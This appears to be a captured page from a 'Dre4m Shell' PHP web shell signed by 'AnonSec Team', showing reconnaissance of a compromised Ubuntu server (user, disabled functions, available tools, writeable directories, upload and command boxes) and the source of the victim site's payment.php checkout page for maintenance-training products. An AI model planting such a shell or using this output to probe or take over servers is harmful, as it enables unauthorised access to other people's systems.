Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 18.191.141.17
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/html/admin/payment.php
<?php 
session_start();

$_SESSION['shipfirstname']=$_POST['shipfirstname'];
//$_SESSION['shipmiddlename']=$_POST['shipmiddlename'];
$_SESSION['shiplastname']=$_POST['shiplastname'];
$_SESSION['shipcompany']=$_POST['shipcompany'];
$_SESSION['shiptitle']=$_POST['shiptitle'];
$_SESSION['shipadd1']=$_POST['shipadd1'];
$_SESSION['shipadd2']=$_POST['shipadd2'];
$_SESSION['shipcity']=$_POST['shipcity'];
$_SESSION['shipstate']=$_POST['shipstate'];
$_SESSION['shipzip']=$_POST['shipzip'];
$_SESSION['shipemail']=$_POST['shipemail'];
$_SESSION['shipcountry']=$_POST['shipcountry'];


$_SESSION['billfirstname']=$_POST['billfirstname'];
//$_SESSION['billmiddlename']=$_POST['billmiddlename'];
$_SESSION['billlastname']=$_POST['billlastname'];
$_SESSION['billcompany']=$_POST['billcompany'];
$_SESSION['billtitle']=$_POST['billtitle'];
$_SESSION['billadd1']=$_POST['billadd1'];
$_SESSION['billadd2']=$_POST['billadd2'];
$_SESSION['billcity']=$_POST['billcity'];
$_SESSION['billstate']=$_POST['billstate'];
$_SESSION['billzip']=$_POST['billzip'];
$_SESSION['billemail']=$_POST['billemail'];
$_SESSION['billcountry']=$_POST['billcountry'];
?>
<script language="javascript">
          function validateform()
          {
			//if(document.getElementById("paytype1").checked==false && document.getElementById("paytype2").checked==false && document.getElementById("paytype3").checked==false && document.getElementById("paytype4").checked==false)
			if(document.getElementById("paytype2").checked==false && document.getElementById("paytype3").checked==false && document.getElementById("paytype4").checked==false)
		  {
			alert("Please select one payment type"); 
			//document.getElementById("paytype1").focus();
			 return false;
		  }
		  /*if(document.getElementById("paytype1").checked==true)
		  {
			  var selectedCombobox=(myform.creditcardtype.value);
			  if (selectedCombobox=="-1")
			  {
					alert("Please Select Card Type");
					 return false;
			  }
			  
			  if(document.getElementById("creditcardno").value == "")
			  {
			  alert("Please provide Creditcard No");
			  document.getElementById("creditcardno").focus();
			  return false;
			  }
			  if(document.getElementById("creditcardname").value == "")
			  {
			  alert("Please provide Creditcard Name");
			  document.getElementById("creditcardname").focus();
			  return false;
			  }
			  if(document.getElementById("ccmonth").value == "")
			  {
			  alert("Please provide Expiry Month");
			  document.getElementById("ccmonth").focus();
			  return false;
			  }
			  if(document.getElementById("ccyear").value == "")
			  {
			  alert("Please provide expiry Year");
			  document.getElementById("ccyear").focus();
			  return false;
			  }
		  }*/
		  if(document.getElementById("paytype2").checked==true)
		  {
			  if(document.getElementById("ponumber").value=="")
			  {
				  alert("Please provide Po Number");
				  document.getElementById("ponumber").focus();
				  return false;
			  }
		  }
		  if(document.getElementById("paytype3").checked==true)
		  {
			  if(document.getElementById("checknumber").value=="")
			  {
				  alert("Please provide Check Number");
				  document.getElementById("checknumber").focus();
				  return false;
			  }
		  }
		  
      return true;
}

 </script>
<!DOCTYPE html> <HTML>
<HEAD>
<title>Joel Levitt, Maintenance Management Seminar</title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta content="" name="description" />
<meta content="maintenance management, maintenance management training" name="keywords" />
<link href="css/style.css" type="text/css" rel="stylesheet">
</HEAD>
<BODY BGCOLOR=#FFFFFF LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0>
<!-- ImageReady Slices (maintrainer_slice2.jpg) -->
<TABLE WIDTH="100%" BORDER=0 CELLPADDING=0 CELLSPACING=0 align="center">
	<?php include_once('include/include_header.php'); ?>	
	
	<TR>
		<TD width="100%" align="center">
			<table border="0" cellpadding="0" cellspacing="0"  width="960" align="center" class="body_bg" style="border-color:">
				<tr><td style="height:9px;"></td></tr>
                <tr>
					<td style="width:9px;"></td>
                    <td style="width:235px" class="content_bg" align="center" valign="top">
                    	<table border="0" cellpadding="0" cellspacing="0">
							<tr><td style="height:10px;"></td></tr>
							<tr>
								<td style="height:132px; width:217px;" valign="top">
									<?php include_once('include_shopcategory.php'); ?>
                                    <!--<table border="0" cellpadding="0" cellspacing="0" width="100%">
                                    	<tr>
                                        	<td align="left" height="40" width="10%" style="padding-left:10px; padding-right:10px;"><img src="images/bullet.gif" border="0"></td>
                                            <td class="left_nav" height="40" width="90%"><a href="shopCategory.php?categoryRefId=1">Books</a></td>
                                        </tr>
                                        <tr><td colspan="2"><img src="images/small_line.gif" border="0"></td></tr>
                                        <tr>
                                        	<td align="left" height="40" width="10%" style="padding-left:10px; padding-right:10px;"><img src="images/bullet.gif" border="0"></td>
                                            <td class="left_nav" height="40"><a href="shopCategory.php?categoryRefId=3">Audio Training</a></td>
                                        </tr>
                                        <tr><td colspan="2"><img src="images/small_line.gif" border="0"></td></tr>
                                        <tr>
                                        	<td align="left" height="40" width="10%" style="padding-left:10px; padding-right:10px;"><img src="images/bullet.gif" border="0"></td>
                                            <td class="left_nav" height="40"><a href="shopCategory.php?categoryRefId=6">Self Study Courses</a></td>
                                        </tr>
                                        <tr><td colspan="2"><img src="images/small_line.gif" border="0"></td></tr>
                                        <tr>
                                        	<td align="left" height="40" width="10%" style="padding-left:10px; padding-right:10px;"><img src="images/bullet.gif" border="0"></td>
                                            <td class="left_nav" height="40"><a href="shop_computer_based_training.html" target="_blank">CBT (Computer Based Training)</a></td>
                                        </tr>
                                        <tr><td colspan="2"><img src="images/small_line.gif" border="0"></td></tr>
                                        <tr>
                                        	<td align="left" height="40" width="10%" style="padding-left:10px; padding-right:10px;"><img src="images/bullet.gif" border="0"></td>
                                            <td class="left_nav" height="40"><a href="shopCategory.php?categoryRefId=8">Clearance to Shop</a></td>
                                        </tr>
                                        <tr><td colspan="2"><img src="images/small_line.gif" border="0"></td></tr>
                                        <tr><td height="40px;"></td></tr>
                                        <?php 
										//if(isset($_SESSION['viewcart'])==1)	
										//{
                                        ?>
                                        <tr>
                                        	<td align="left" height="40" width="10%" style="padding-left:10px; padding-right:10px;"><img src="images/bullet.gif" border="0"></td>
                                            <td class="left_nav" height="40"><a href="cart.php">View Cart</a></td>
                                        </tr>
                                        <?php
										//}
										?>
                                    </table>-->
								</td>
							</tr>
						</table>
					</td>
					<td style="width:9px;"></td>
					<td style="width:696px;" class="content_bg" valign="top">
                    <TABLE WIDTH=90% BORDER=0 CELLPADDING=0 CELLSPACING=0 align="center">
              			 <tr>
                            	<td class="main_head" align="left" style="padding:12px;">Payment</td>
                         </tr>
                         <tr>
						 <td align="center"><img src="images/large-line2.gif" border="0"></td></tr>
				    <form action="pay-processing.php" name="myform" id="myform" method="post" onSubmit="return validateform();">
                    <tr><td style="padding-left:10px; padding-top:10px;">
                    
                    <!--<input type="radio" name="paytype" id="paytype1" value="cc">&nbsp;Pay By Credit Card</td></tr>
                    <tr>
                    	<Td style="padding-left:38px;">
                        	<table border="0" cellpadding="0" cellspacing="10" class="normal_text">
                    
                    <tr>
                        <td class="normal_text" >Credit Card Type <font color="red">*</font></td>
                    <td>
                        <select name="creditcardtype" id="creditcardtype" style="width:150px;" class="txtbox">
                                                	<option value="-1">Select</option>
                                                    <option>Visa</option>
                                                    <option>Master Card</option>
                                                    <option>American Express</option>
                                                </select>
                                            </td>
                                        </tr>
                                        <tr>
                                            <td class="normal_text">Credit Card No. <font color="red">*</font></td>
                                            <td><input type="text" style="width:250px;" name="creditcardno" id="creditcardno" value="" class="txtbox"></td>
                                        </tr>
                                        <tr>
                                            <td class="normal_text">Credit Card Name <font color="red">*</font></td>
                                            <td><input type="text" style="width:250px;" name="creditcardname" id="creditcardname" value="" class="txtbox"></td>
                                        </tr>
                                        <tr>
                                        	<td class="normal_text">Date of Expiry <font color="red">*</font></td>
                                            <td class="normal_text">
                                            	Month&nbsp;<input style="width:100px;" type="text" name="ccmonth" id="ccmonth" value="" class="txtbox">
                                                &nbsp;&nbsp;Year&nbsp;<input style="width:100px;" type="text" name="ccyear" id="ccyear" value="" class="txtbox">
                                            </td>
                                        </tr>
                                        <tr>
                                        	<td class="normal_text">CVV Number</td>
                                            <td>
                                            	<input style="width:100px;" type="text" name="cccvvno" id="cccvvno" value="" class="txtbox">
                                            </td>
                                        </tr>
										 <tr>
                                        	<td class="normal_text">Coupon Code</td>
                                            <td>
                                            	<input style="width:200px;" type="text" name="couponcode" id="couponcode" value="" class="txtbox">
                                            </td>
                                        </tr>
                                        
                                        
                                    </table>
                        </Td>
                        </tr>-->
                         <tr>
						<td style="padding-left:10px; padding-top:10px;">
							<input type="radio" name="paytype" id="paytype4" value="paypal">&nbsp;<b>Using PayPal / Credit Card.</b>
                        </td>
					</tr>
                        <tr><td style="height:20px;"></td></tr>
                                            <tr><td style="padding-left:10px; padding-top:10px;"><input type="radio" name="paytype" id="paytype2" value="po"> Using Puchase Order</td></tr>
                                            <tr><td style="padding-left:38px;" class="normal_text" colspan="2">Please fax PO to 610-397-1007 or E-mail to JDL@Maintrainer.com 
                                    <br>
                                      We will ship against a PO for rated companies. Please use the reciept geneated by the website<br>for the charges and shipping info.
                                    </td></tr>
                    <tr>
                    	<td style="padding-left:38px;">
                        	<table border="0" cellpadding="0" cellspacing="10">
                                    
                                    <tr>
                                      <td class="normal_text" valign="top">PO Number</td>
                                       <td>
                                         <input type="text" class="txtbox" name="ponumber" id="ponumber">
                                       </td>
                                     </tr>
                                     <tr><td class="normal_text" valign="top">Details </td>
                                       <td>
                                         <textarea rows="5" cols="50" name="podetails" id="podetails"></textarea>
                                       </td>
                                     </tr>
                             </table>
                        </td>
                    </tr>
                    <tr><td style="height:20px;"></td></tr>
                    <tr><td style="padding-left:10px; padding-top:10px;"><input type="radio" name="paytype" id="paytype3" value="chk"> Using Company Check</td></tr>
                                            <tr><td style="padding-left:38px;" class="normal_text" colspan="2">We will ship to organizations using a company check. Please use reciept geneated by the website for the charges
                                    </td></tr>
                    <tr>
                    	<td style="padding-left:38px;">
                        <table border="0" cellpadding="0" cellspacing="10">
                                    <tr><td class="normal_text">Check Number</td>
                                    <td>
                                         <input type="text" class="txtbox" name="checknumber" id="checknumber"></td></tr>
                                         <tr><td class="normal_text" valign="top">Details</td>
                                         <td>
                                         <textarea rows="5" cols="50" name="checkdetails" id="checkdetails"></textarea>
                                         </td></tr>
                          </table>
                         </td>
                    </tr>
					<tr><td style="height:20px;"></td></tr>
                    
                   
                    <tr><td style="height:20px;"></td></tr>
                   
                    <tr>
					   <td style="padding-left:38px;">
					   		<input type="submit"  name="next" value="Next" class="bttn" style="padding-left:15px; padding-right:15px;">
						</td>	
                    </tr>
                    <tr><td style="height:40px;"></td></tr>
              </table>
           </td>
      
        </form>

					<td style="width:9px;"></td>
				</tr>
                <tr><td style="height:9px;"></td></tr>
			</table>
		</TD>
	</TR>
	<?php include_once('include/include_footer.php'); ?>
</TABLE>
<!-- End ImageReady Slices -->
</BODY>
</HTML>

Anon7 - 2022
AnonSec Team